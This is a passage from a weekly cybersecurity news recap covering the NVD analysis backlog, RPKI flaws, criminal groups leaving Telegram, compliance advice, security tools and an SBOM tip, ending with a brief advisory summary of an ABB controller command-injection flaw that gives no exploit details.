*   **NIST NVD Backlog Crisis - 18,000+ CVEs Unanalyzed:** A new analysis has revealed that the National Institute of Standards and Technology (NIST), the U.S. government standards body, has still a long way to go in terms of analyzing newly published CVEs. As of September 21, 2024, 72.4% of CVEs (18,358 CVEs) in the NVD have yet to be analyzed, VulnCheck said, adding "46.7% of Known Exploited Vulnerabilities (KEVs) remain unanalyzed by the NVD (compared to 50.8% as of May 19, 2024)." It's worth noting that a total of 25,357 new vulnerabilities have been added to NVD since February 12, 2024, when NIST scaled back its processing and enrichment of new vulnerabilities.
*   **Major RPKI Flaws Uncovered in BGP's Cryptographic Defense:** A group of German researchers has found that current implementations of Resource Public Key Infrastructure (RPKI), which was introduced as a way to introduce a cryptographic layer to Border Gateway Protocol (BGP), "lack production-grade resilience and are plagued by software vulnerabilities, inconsistent specifications, and operational challenges." These vulnerabilities range from denial-of-service and authentication bypass to cache poisoning and remote code execution.
*   **Telegram's Data Policy Shift Pushes Cybercriminals to Alternative Apps:** Telegram's recent decision to give users' IP addresses and phone numbers to authorities in response to valid legal requests is prompting cybercrime groups to seek other alternatives to the messaging app, including Jabber, Tox, Matrix, Signal, and Session. The Bl00dy ransomware gang has declared that it's "quitting Telegram," while hacktivist groups like Al Ahad, Moroccan Cyber Aliens, and RipperSec have expressed an intent to move to Signal and Discord. That said, neither Signal nor Session support bot functionality or APIs like Telegram nor do they have extensive group messaging capabilities. Jabber and Tox, on the other hand, have already been used by adversaries operating on underground forums. "Telegram's expansive global user base still provides extensive reach, which is crucial for cybercriminal activities such as disseminating information, recruiting associates or selling illicit goods and services," Intel 471 said. Telegram CEO Pavel Durov, however, has downplayed the changes, stating "little has changed" and that it has been sharing data with law enforcement since 2018 in response to valid legal requests. "For example, in Brazil, we disclosed data for 75 legal requests in Q1 (January-March) 2024, 63 in Q2, and 65 in Q3. In India, our largest market, we satisfied 2461 legal requests in Q1, 2151 in Q2, and 2380 in Q3," Durov added.

**🔥 **Cybersecurity Resources & Insights****

*   **LIVE Webinars**
    *   **Modernization of Authentication: Passwords vs Passwordless and MFA:** Are you sure your passwords are enough? Discover the truth about passwordless tech and how MFA can protect you in ways you didn't even know you needed. Join our webinar to get ahead of the next big shift in cybersecurity.
*   **Ask the Expert**
    *   **Q: How can organizations reduce compliance costs while strengthening their security measures?**
    *   **A:** You can reduce compliance costs while strengthening security by smartly integrating modern tech and frameworks. Start by adopting unified security models like NIST CSF or ISO 27001 to cover multiple compliance needs, making audits easier. Focus on high-risk areas using methods like FAIR so your efforts tackle the most critical threats. Automate compliance checks with tools like Splunk or IBM QRadar, and use AI for faster threat detection. Consolidate your security tools into platforms like Microsoft 365 Defender to save on licenses and simplify management. Using cloud services with built-in compliance from providers like AWS or Azure can also cut infrastructure costs. Boost your team's security awareness with interactive training platforms to build a culture that avoids mistakes. Automate compliance reporting using ServiceNow GRC to make documentation easy. Implement Zero Trust strategies like micro-segmentation and continuous identity verification to strengthen defenses. Keep an eye on your systems with tools like Tenable.io to find and fix vulnerabilities early. By following these steps, you can save on compliance expenses while keeping your security strong.
*   **Cybersecurity Tools**
    *   **capa Explorer Web** is a browser-based tool that lets you interactively explore program capabilities identified by capa. It provides an easy way to analyze and visualize capa's results in your web browser. capa is a free, open-source tool by the FLARE team that extracts capabilities from executable files, helping you triage unknown files, guide reverse engineering, and hunt for malware.
    *   **Ransomware Tool Matrix** is an up-to-date list of tools used by ransomware and extortion gangs. Since these cybercriminals often reuse tools, we can use this info to hunt for threats, improve incident responses, spot patterns in their behavior, and simulate their tactics in security drills.

****🔒 Tip of the Week****

**Keep an "Ingredients List" for Your Software:** Your software is like a recipe made from various ingredients—third-party components and open-source libraries. By creating a **Software Bill of Materials (SBOM)**, a detailed list of these components, you can quickly find and fix security issues when they arise. Regularly update this list, integrate it into your development process, watch for new vulnerabilities, and educate your team about these parts. This reduces hidden risks, speeds up problem-solving, meets regulations, and builds trust through transparency.

****Conclusion****

Wow, this week really showed us that cyber threats can pop up where we least expect them—even in apps and networks we trust. The big lesson? Stay alert and always question what's in front of you. Keep learning, stay curious, and let's outsmart the bad guys together. Until next time, stay safe out there!

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

THN Cybersecurity Recap: Top Threats and Trends (Sep 30 - Oct 6)

The ABB BMS/BAS controller suffers from an authenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the 'SYSLOG' HTTP POST parameter called by the syslogSwitch.php script.

Tag

#vulnerability